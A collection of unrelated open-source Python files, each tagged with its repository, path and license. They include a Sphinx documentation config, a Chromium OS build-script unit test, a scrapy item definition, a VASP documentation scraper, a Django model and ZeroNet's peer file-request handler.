_href=URL(args=[r.id, "poll"])
)
output["rheader"] = poll_btn
return output
s3.postp = postp
return s3_rest_controller("msg")
# -----------------------------------------------------------------------------
def alert_recipient():
"""
RESTful CRUD controller for options.s3json lookups
- needed for adding recipients
"""
s3.prep = lambda r: r.method == "options" and r.representation == "s3json"
return s3_rest_controller()
# -----------------------------------------------------------------------------
# Messaging
#
def compose():
""" Send message to people/teams """
return s3db.hrm_compose()
# END =========================================================================
| gallifrey17/eden | controllers/deploy.py | Python | mit | 30,000 |
# -*- coding: utf-8 -*-
#
# icestudio documentation build configuration file, created by
# sphinx-quickstart on Thu May 26 11:44:15 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['source/_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Icestudio'
copyright = u'2016-2018, Jesús Arroyo Torrens'
author = u'Jesús Arroyo Torrens'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'0.3.3'
# The full version, including alpha/beta/rc tags.
release = u'0.3.3'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
class MyClass:
"""A simple example class"""
i = 12345
def f(self):
return 'hello world'
x = MyClass()
x.f()
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents.
# "<project> v<release> documentation" by default.
#html_title = u'icestudio v0.2a1'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (relative to this directory) to use as a favicon of
# the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['source/_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not None, a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
# The empty string is equivalent to '%b %d, %Y'.
#html_last_updated_fmt = None
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr', 'zh'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# 'ja' uses this config value.
# 'zh' user can custom change `jieba` dictionary path.
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'icestudiodoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'icestudio.tex', u'icestudio Documentation',
u'Jesús Arroyo Torrens', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'icestudio', u'icestudio Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'icestudio', u'icestudio Documentation',
author, 'icestudio', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not
# optimized for small screen space, using the same theme for HTML and epub
# output is usually not wise. This defaults to 'epub', a theme designed to save
# visual space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files that should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
| Jesus89/icestudio | docs/conf.py | Python | gpl-2.0 | 11,589 |
# -*- coding: utf-8 -*-
# Copyright (c) 2012 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for cros_mark_chrome_as_stable.py."""
from __future__ import print_function
import base64
import os
import sys
from textwrap import dedent
import mock
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import gob_util
from chromite.lib import osutils
from chromite.lib import partial_mock
from chromite.lib import portage_util
from chromite.scripts import cros_mark_chrome_as_stable
pytestmark = cros_test_lib.pytestmark_inside_only
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
unstable_data = 'KEYWORDS=~x86 ~arm'
stable_data = 'KEYWORDS=x86 arm'
class CrosMarkChromeAsStable(cros_test_lib.MockTempDirTestCase):
"""Tests for cros_mark_chrome_as_stable."""
def setUp(self):
"""Setup vars and create mock dir."""
self.tmp_overlay = os.path.join(self.tempdir, 'chromiumos-overlay')
self.mock_chrome_dir = os.path.join(self.tmp_overlay, constants.CHROME_CP)
os.makedirs(self.mock_chrome_dir)
ebuild = os.path.join(self.mock_chrome_dir,
constants.CHROME_PN + '-%s.ebuild')
self.unstable = ebuild % '9999'
self.sticky_branch = '8.0.224'
self.sticky_version = '%s.503' % self.sticky_branch
self.sticky = ebuild % self.sticky_version
self.sticky_rc_version = '%s.504' % self.sticky_branch
self.sticky_rc = ebuild % (self.sticky_rc_version + '_rc-r1')
self.latest_stable_version = '8.0.300.1'
self.latest_stable = ebuild % (self.latest_stable_version + '_rc-r2')
self.tot_stable_version = '9.0.305.0'
self.tot_stable = ebuild % (self.tot_stable_version + '_alpha-r1')
self.sticky_new_rc_version = '%s.520' % self.sticky_branch
self.sticky_new_rc = ebuild % (self.sticky_new_rc_version + '_rc-r1')
self.latest_new_version = '9.0.305.1'
self.latest_new = ebuild % (self.latest_new_version + '_rc-r1')
self.tot_new_version = '9.0.306.0'
self.tot_new = ebuild % (self.tot_new_version + '_alpha-r1')
osutils.WriteFile(self.unstable, unstable_data)
osutils.WriteFile(self.sticky, stable_data)
osutils.WriteFile(self.sticky_rc, stable_data)
osutils.WriteFile(self.latest_stable, stable_data)
osutils.WriteFile(self.tot_stable, '')
def testFindChromeCandidates(self):
"""Test creation of stable ebuilds from mock dir."""
unstable, stable_ebuilds = cros_mark_chrome_as_stable.FindChromeCandidates(
self.mock_chrome_dir)
stable_ebuild_paths = [x.ebuild_path for x in stable_ebuilds]
self.assertEqual(unstable.ebuild_path, self.unstable)
self.assertEqual(len(stable_ebuilds), 4)
self.assertIn(self.sticky, stable_ebuild_paths)
self.assertIn(self.sticky_rc, stable_ebuild_paths)
self.assertIn(self.latest_stable, stable_ebuild_paths)
self.assertIn(self.tot_stable, stable_ebuild_paths)
def _GetStableEBuilds(self):
"""Common helper to create a list of stable ebuilds."""
return [
cros_mark_chrome_as_stable.ChromeEBuild(self.sticky),
cros_mark_chrome_as_stable.ChromeEBuild(self.sticky_rc),
cros_mark_chrome_as_stable.ChromeEBuild(self.latest_stable),
cros_mark_chrome_as_stable.ChromeEBuild(self.tot_stable),
]
def testTOTFindChromeUprevCandidate(self):
"""Tests if we can find tot uprev candidate from our mock dir data."""
stable_ebuilds = self._GetStableEBuilds()
candidate = cros_mark_chrome_as_stable.FindChromeUprevCandidate(
stable_ebuilds, constants.CHROME_REV_TOT,
self.sticky_branch)
self.assertEqual(candidate.ebuild_path, self.tot_stable)
def testLatestFindChromeUprevCandidate(self):
"""Tests if we can find latest uprev candidate from our mock dir data."""
stable_ebuilds = self._GetStableEBuilds()
candidate = cros_mark_chrome_as_stable.FindChromeUprevCandidate(
stable_ebuilds, constants.CHROME_REV_LATEST,
self.sticky_branch)
self.assertEqual(candidate.ebuild_path, self.latest_stable)
def testStickyFindChromeUprevCandidate(self):
"""Tests if we can find sticky uprev candidate from our mock dir data."""
stable_ebuilds = self._GetStableEBuilds()
candidate = cros_mark_chrome_as_stable.FindChromeUprevCandidate(
stable_ebuilds, constants.CHROME_REV_STICKY,
self.sticky_branch)
self.assertEqual(candidate.ebuild_path, self.sticky_rc)
def testGetTipOfTrunkRevision(self):
"""Tests if we can get the latest svn revision from TOT."""
A_URL = 'dorf://mink/delaane/forkat/sertiunu.ortg./desk'
result = {'log': [{'commit': 'deadbeef' * 5}]}
self.PatchObject(gob_util, 'FetchUrlJson', return_value=result)
revision = gob_util.GetTipOfTrunkRevision(A_URL)
self.assertEqual(revision, 'deadbeef' * 5)
def testGetTipOfTrunkVersion(self):
"""Tests if we get the latest version from TOT."""
TEST_URL = 'proto://host.org/path/to/repo'
TEST_VERSION_CONTENTS = dedent("""\
A=8
B=0
C=256
D=0""").encode('utf-8')
result = base64.b64encode(TEST_VERSION_CONTENTS)
self.PatchObject(gob_util, 'FetchUrl', return_value=result)
# pylint: disable=protected-access
version = cros_mark_chrome_as_stable._GetSpecificVersionUrl(
TEST_URL, 'test-revision')
self.assertEqual(version, '8.0.256.0')
def testCheckIfChromeRightForOS(self):
"""Tests if we can find the chromeos build from our mock DEPS."""
test_data1 = "buildspec_platforms:\n 'chromeos,',\n"
test_data2 = "buildspec_platforms:\n 'android,',\n"
expected_deps = cros_mark_chrome_as_stable.CheckIfChromeRightForOS(
test_data1)
unexpected_deps = cros_mark_chrome_as_stable.CheckIfChromeRightForOS(
test_data2)
self.assertTrue(expected_deps)
self.assertFalse(unexpected_deps)
def testGetLatestRelease(self):
"""Tests if we can find the latest release from our mock url data."""
TEST_HOST = 'sores.chromium.org'
TEST_URL = 'phthp://%s/tqs' % TEST_HOST
TEST_TAGS = ['7.0.224.1', '7.0.224', '8.0.365.5', 'foo', 'bar-12.13.14.15']
TEST_REFS_JSON = dict((tag, None) for tag in TEST_TAGS)
TEST_BAD_DEPS_CONTENT = dedent("""\
buildspec_platforms: 'TRS-80,',
""").encode('utf-8')
TEST_GOOD_DEPS_CONTENT = dedent("""\
buildspec_platforms: 'chromeos,',
""").encode('utf-8')
self.PatchObject(gob_util, 'FetchUrl', side_effect=(
base64.b64encode(TEST_BAD_DEPS_CONTENT),
base64.b64encode(TEST_GOOD_DEPS_CONTENT),
))
self.PatchObject(gob_util, 'FetchUrlJson', side_effect=(TEST_REFS_JSON,))
release = cros_mark_chrome_as_stable.GetLatestRelease(TEST_URL)
self.assertEqual('7.0.224.1', release)
def testGetLatestStickyRelease(self):
"""Tests if we can find the latest sticky release from our mock url data."""
TEST_HOST = 'sores.chromium.org'
TEST_URL = 'phthp://%s/tqs' % TEST_HOST
TEST_TAGS = ['7.0.224.2', '7.0.224', '7.0.365.5', 'foo', 'bar-12.13.14.15']
TEST_REFS_JSON = dict((tag, None) for tag in TEST_TAGS)
TEST_DEPS_CONTENT = dedent("""\
buildspec_platforms: 'chromeos,',
""").encode('utf-8')
self.PatchObject(gob_util, 'FetchUrl', side_effect=(
base64.b64encode(TEST_DEPS_CONTENT),
))
self.PatchObject(gob_util, 'FetchUrlJson', side_effect=(TEST_REFS_JSON,))
release = cros_mark_chrome_as_stable.GetLatestRelease(TEST_URL, '7.0.224')
self.assertEqual('7.0.224.2', release)
def testLatestChromeRevisionListLink(self):
"""Tests link generation to rev lists.
Verifies that we can generate a link to the revision list between the
latest Chromium release and the last one we successfully built.
"""
osutils.WriteFile(self.latest_new, stable_data)
expected = cros_mark_chrome_as_stable.GetChromeRevisionLinkFromVersions(
self.latest_stable_version, self.latest_new_version)
made = cros_mark_chrome_as_stable.GetChromeRevisionListLink(
cros_mark_chrome_as_stable.ChromeEBuild(self.latest_stable),
cros_mark_chrome_as_stable.ChromeEBuild(self.latest_new),
constants.CHROME_REV_LATEST)
self.assertEqual(expected, made)
def testStickyEBuild(self):
"""Tests if we can find the sticky ebuild from our mock directories."""
# pylint: disable=protected-access
stable_ebuilds = self._GetStableEBuilds()
sticky_ebuild = cros_mark_chrome_as_stable._GetStickyEBuild(
stable_ebuilds)
self.assertEqual(sticky_ebuild.chrome_version, self.sticky_version)
def testChromeEBuildInit(self):
"""Tests if the chrome_version is set correctly in a ChromeEBuild."""
ebuild = cros_mark_chrome_as_stable.ChromeEBuild(self.sticky)
self.assertEqual(ebuild.chrome_version, self.sticky_version)
def _CommonMarkAsStableTest(self, chrome_rev, new_version, old_ebuild_path,
new_ebuild_path, commit_string_indicator):
"""Common function used for test functions for MarkChromeEBuildAsStable.
This function stubs out others calls, and runs MarkChromeEBuildAsStable
with the specified args.
Args:
chrome_rev: standard chrome_rev argument
new_version: version we are revving up to
old_ebuild_path: path to the stable ebuild
new_ebuild_path: path to the to be created path
commit_string_indicator: a string that the commit message must contain
"""
self.PatchObject(cros_build_lib, 'run',
side_effect=Exception('should not be called'))
self.PatchObject(portage_util.EBuild, 'GetCrosWorkonVars',
return_value=None)
git_mock = self.PatchObject(git, 'RunGit')
commit_mock = self.PatchObject(portage_util.EBuild, 'CommitChange')
stable_candidate = cros_mark_chrome_as_stable.ChromeEBuild(old_ebuild_path)
unstable_ebuild = cros_mark_chrome_as_stable.ChromeEBuild(self.unstable)
chrome_pn = 'chromeos-chrome'
chrome_version = new_version
package_dir = self.mock_chrome_dir
cros_mark_chrome_as_stable.MarkChromeEBuildAsStable(
stable_candidate, unstable_ebuild, chrome_pn, chrome_rev,
chrome_version, package_dir)
git_mock.assert_has_calls([
mock.call(package_dir, ['add', new_ebuild_path]),
mock.call(package_dir, ['rm', old_ebuild_path]),
])
commit_mock.assert_called_with(
partial_mock.HasString(commit_string_indicator),
package_dir)
def testStickyMarkAsStable(self):
"""Tests to see if we can mark chrome as stable for a new sticky release."""
self._CommonMarkAsStableTest(
constants.CHROME_REV_STICKY,
self.sticky_new_rc_version, self.sticky_rc,
self.sticky_new_rc, 'stable_release')
def testLatestMarkAsStable(self):
"""Tests to see if we can mark chrome for a latest release."""
self._CommonMarkAsStableTest(
constants.CHROME_REV_LATEST,
self.latest_new_version, self.latest_stable,
self.latest_new, 'latest_release')
def testTotMarkAsStable(self):
"""Tests to see if we can mark chrome for tot."""
self._CommonMarkAsStableTest(
constants.CHROME_REV_TOT,
self.tot_new_version, self.tot_stable,
self.tot_new, 'tot')
| endlessm/chromium-browser | third_party/chromite/scripts/cros_mark_chrome_as_stable_unittest.py | Python | bsd-3-clause | 11,462 |
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# http://doc.scrapy.org/en/latest/topics/items.html
from scrapy.item import Item, Field
class WeibozItem(Item):
# define the fields for your item here like:
# name = scrapy.Field()
    mblogid = Field(serializer=str)  # Weibo post (mblog) ID
    created_at = Field(serializer=str)  # time the post was created
    comments_count = Field(serializer=int)  # number of comments
    reposts_count = Field(serializer=int)  # number of reposts
    like_count = Field(serializer=int)  # number of likes
    text = Field(serializer=str)  # post body text
    scheme = Field(serializer=str)  # URL of the post
    user = Field()  # user name / follower count / post count
    # fields needed for later post-processing
admin=Field()
price=Field()
tag=Field()
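# Hypothetical usage sketch: a scrapy Item behaves like a dict restricted to
# the fields declared above, so a spider callback could populate it like this
# (the values below are made up for illustration).
if __name__ == '__main__':
    item = WeibozItem()
    item['mblogid'] = '4093274581234567'
    item['text'] = 'example post body'
    item['like_count'] = 42
    print(dict(item))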
| luzhijun/weiboSA | _site/weiboZ/items.py | Python | apache-2.0 | 805 |
"""
Get help with VASP parameters from VASP wiki.
"""
import re
import requests
import urllib3
from bs4 import BeautifulSoup
class VaspDoc:
"""
A VASP documentation helper.
"""
def __init__(self):
"""
Init for VaspDoc.
"""
self.url_template = "http://www.vasp.at/wiki/index.php/%s"
urllib3.disable_warnings()
def print_help(self, tag):
"""
Print the help for a TAG.
Args:
tag (str): Tag used in VASP.
"""
print(self.get_help(tag))
def print_jupyter_help(self, tag):
"""
Display HTML help in ipython notebook.
Args:
tag (str): Tag used in VASP.
"""
help = self.get_help(tag, "html")
from IPython.core.display import HTML, display
display(HTML(help))
@classmethod
def get_help(cls, tag, fmt="text"):
"""
Get help on a VASP tag.
Args:
tag (str): VASP tag, e.g., ISYM.
Returns:
Help text.
"""
tag = tag.upper()
r = requests.get("http://www.vasp.at/wiki/index.php/%s" % tag, verify=False)
soup = BeautifulSoup(r.text)
main_doc = soup.find(id="mw-content-text")
if fmt == "text":
output = main_doc.text
output = re.sub("\n{2,}", "\n\n", output)
else:
output = str(main_doc)
return output
@classmethod
def get_incar_tags(cls):
"""
Returns: All incar tags
"""
tags = []
for page in [
"http://www.vasp.at/wiki/index.php/Category:INCAR",
"http://www.vasp.at/wiki/index.php?title=Category:INCAR&pagefrom=ML+FF+LCONF+DISCARD#mw-pages",
]:
r = requests.get(page, verify=False)
soup = BeautifulSoup(r.text)
for div in soup.findAll("div", {"class": "mw-category-group"}):
children = div.findChildren("li")
for child in children:
tags.append(child.text.strip())
return tags
if __name__ == "__main__":
doc = VaspDoc()
doc.print_help("ISYM")
print(doc.get_incar_tags())
| vorwerkc/pymatgen | pymatgen/io/vasp/help.py | Python | mit | 2,205 |
from django.db import models
from datetime import datetime
from isecho.settings import LANGUAGES
class Flatpage(models.Model):
title = models.CharField(max_length=200, blank=False)
slug = models.SlugField()
body = models.TextField()
    date = models.DateField(blank=False, default=datetime.now)  # pass the callable so the default is evaluated at save time, not at import time
language = models.CharField(max_length=6, blank=False, choices=LANGUAGES, default="en")
| mrafieee/django-base | apps/flatpages/models.py | Python | gpl-3.0 | 406 |
# Included modules
import socket
import struct
import os
from cStringIO import StringIO
# Third party modules
import gevent
from Debug import Debug
from Config import config
from util import RateLimit, StreamingMsgpack
FILE_BUFF = 1024*512
# Request from me
class FileRequest(object):
__slots__ = ("server", "connection", "req_id", "sites", "log", "responded")
def __init__(self, server, connection):
self.server = server
self.connection = connection
self.req_id = None
self.sites = self.server.sites
self.log = server.log
self.responded = False # Responded to the request
def unpackAddress(self, packed):
return socket.inet_ntoa(packed[0:4]), struct.unpack_from("H", packed, 4)[0]
def send(self, msg, streaming=False):
if not self.connection.closed:
self.connection.send(msg, streaming)
def response(self, msg, streaming=False):
if self.responded:
self.log.debug("Req id %s already responded" % self.req_id)
return
if not isinstance(msg, dict): # If msg not a dict create a {"body": msg}
msg = {"body": msg}
msg["cmd"] = "response"
msg["to"] = self.req_id
self.responded = True
self.send(msg, streaming=streaming)
# Route file requests
def route(self, cmd, req_id, params):
self.req_id = req_id
if cmd == "getFile":
self.actionGetFile(params)
elif cmd == "update":
event = "%s update %s %s" % (self.connection.id, params["site"], params["inner_path"])
if not RateLimit.isAllowed(event): # There was already an update for this file in the last 10 second
self.response({"ok": "File update queued"})
# If called more than once within 10 sec only keep the last update
RateLimit.callAsync(event, 10, self.actionUpdate, params)
elif cmd == "pex":
self.actionPex(params)
elif cmd == "listModified":
self.actionListModified(params)
elif cmd == "ping":
self.actionPing()
else:
self.actionUnknown(cmd, params)
# Update a site file request
def actionUpdate(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
if site.settings["own"] and params["inner_path"].endswith("content.json"):
self.log.debug("Someone trying to push a file to own site %s, reload local %s first" % (site.address, params["inner_path"]))
changed = site.content_manager.loadContent(params["inner_path"], add_bad_files=False)
if changed: # Content.json changed locally
site.settings["size"] = site.content_manager.getTotalSize() # Update site size
buff = StringIO(params["body"])
valid = site.content_manager.verifyFile(params["inner_path"], buff)
if valid == True: # Valid and changed
self.log.info("Update for %s looks valid, saving..." % params["inner_path"])
buff.seek(0)
site.storage.write(params["inner_path"], buff)
site.onFileDone(params["inner_path"]) # Trigger filedone
if params["inner_path"].endswith("content.json"): # Download every changed file from peer
peer = site.addPeer(self.connection.ip, self.connection.port, return_peer = True) # Add or get peer
site.onComplete.once(lambda: site.publish(inner_path=params["inner_path"]), "publish_%s" % params["inner_path"]) # On complete publish to other peers
gevent.spawn(
lambda: site.downloadContent(params["inner_path"], peer=peer)
) # Load new content file and download changed files in new thread
self.response({"ok": "Thanks, file %s updated!" % params["inner_path"]})
elif valid == None: # Not changed
peer = site.addPeer(*params["peer"], return_peer = True) # Add or get peer
if peer:
self.log.debug("Same version, adding new peer for locked files: %s, tasks: %s" % (peer.key, len(site.worker_manager.tasks)) )
for task in site.worker_manager.tasks: # New peer add to every ongoing task
if task["peers"]: site.needFile(task["inner_path"], peer=peer, update=True, blocking=False) # Download file from this peer too if its peer locked
self.response({"ok": "File not changed"})
else: # Invalid sign or sha1 hash
self.log.debug("Update for %s is invalid" % params["inner_path"])
self.response({"error": "File invalid"})
# Send file content request
def actionGetFile(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
try:
file_path = site.storage.getPath(params["inner_path"])
if config.debug_socket: self.log.debug("Opening file: %s" % file_path)
with StreamingMsgpack.FilePart(file_path, "rb") as file:
file.seek(params["location"])
file.read_bytes = FILE_BUFF
back = {"body": file,
"size": os.fstat(file.fileno()).st_size,
"location": min(file.tell()+FILE_BUFF, os.fstat(file.fileno()).st_size)
}
if config.debug_socket:
self.log.debug("Sending file %s from position %s to %s" % (file_path,
params["location"],
back["location"]))
self.response(back, streaming=True)
if config.debug_socket:
self.log.debug("File %s sent" % file_path)
# Add peer to site if not added before
connected_peer = site.addPeer(self.connection.ip, self.connection.port)
if connected_peer: # Just added
connected_peer.connect(self.connection) # Assign current connection to peer
except Exception, err:
self.log.debug("GetFile read error: %s" % Debug.formatException(err))
self.response({"error": "File read error: %s" % Debug.formatException(err)})
return False
# Peer exchange request
def actionPex(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
got_peer_keys = []
added = 0
connected_peer = site.addPeer(self.connection.ip, self.connection.port) # Add requester peer to site
if connected_peer: # Just added
added += 1
connected_peer.connect(self.connection) # Assign current connection to peer
for peer in params["peers"]: # Add sent peers to site
address = self.unpackAddress(peer)
got_peer_keys.append("%s:%s" % address)
if site.addPeer(*address): added += 1
# Send back peers that is not in the sent list and connectable (not port 0)
packed_peers = [peer.packAddress() for peer in site.getConnectablePeers(params["need"], got_peer_keys)]
if added:
site.worker_manager.onPeers()
self.log.debug("Added %s peers to %s using pex, sending back %s" % (added, site, len(packed_peers)))
self.response({"peers": packed_peers})
# Get modified content.json files since
def actionListModified(self, params):
site = self.sites.get(params["site"])
if not site or not site.settings["serving"]: # Site unknown or not serving
self.response({"error": "Unknown site"})
return False
modified_files = {inner_path: content["modified"]
for inner_path, content in site.content_manager.contents.iteritems()
if content["modified"] > params["since"]}
# Add peer to site if not added before
connected_peer = site.addPeer(self.connection.ip, self.connection.port)
if connected_peer: # Just added
connected_peer.connect(self.connection) # Assign current connection to peer
self.response({"modified_files": modified_files})
# Send a simple Pong! answer
def actionPing(self):
self.response("Pong!")
# Unknown command
def actionUnknown(self, cmd, params):
self.response({"error": "Unknown command: %s" % cmd})
| rarbg/ZeroNet | src/File/FileRequest.py | Python | gpl-2.0 | 8,834 |
import pkg_resources
from string import Template
model_template = Template(pkg_resources.resource_string(__name__, "model_template.C"))
lorentz_calc_template = Template(pkg_resources.resource_string(__name__, "lorentz_calc_template.C"))
sconstruct_template = Template(pkg_resources.resource_string(__name__, "sconstruct_template"))
run_card_template = Template(pkg_resources.resource_string(__name__, "run_card_template"))
| cms-externals/sherpa | MODEL/UFO/templates.py | Python | gpl-3.0 | 427 |
# Copyright © 2020, Joseph Berry, Rico Tabor (opendrop.dev@gmail.com)
# OpenDrop is released under the GNU GPL License. You are free to
# modify and distribute the code, but always under the same license
#
# If you use this software in your research, please cite the following
# journal articles:
#
# J. D. Berry, M. J. Neeson, R. R. Dagastine, D. Y. C. Chan and
# R. F. Tabor, Measurement of surface and interfacial tension using
# pendant drop tensiometry. Journal of Colloid and Interface Science 454
# (2015) 226–237. https://doi.org/10.1016/j.jcis.2015.05.012
#
# E. Huang, T. Denning, A. Skoufis, J. Qi, R. R. Dagastine, R. F. Tabor
# and J. D. Berry, OpenDrop: Open-source software for pendant drop
# tensiometry & contact angle measurements, submitted to the Journal of
# Open Source Software
#
# These citations help us not only to understand who is using and
# developing OpenDrop, and for what purpose, but also to justify
# continued development of this code and other open source resources.
#
# OpenDrop is distributed WITHOUT ANY WARRANTY; without even the
# implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details. You
# should have received a copy of the GNU General Public License along
# with this software. If not, see <https://www.gnu.org/licenses/>.
from .component import ComponentSymbol
from .view import View
from .presenter import Presenter
from .entry_point import EntryPoint
| jdber1/opendrop | opendrop/mvp/__init__.py | Python | gpl-3.0 | 1,481 |
import sys
from services.housing import HouseTemplate
from engine.resources.scene import Point3D
def setup(housingTemplates):
houseTemplate = HouseTemplate("object/tangible/deed/city_deed/shared_cityhall_corellia_deed.iff", "object/building/player/city/shared_cityhall_corellia.iff", 0)
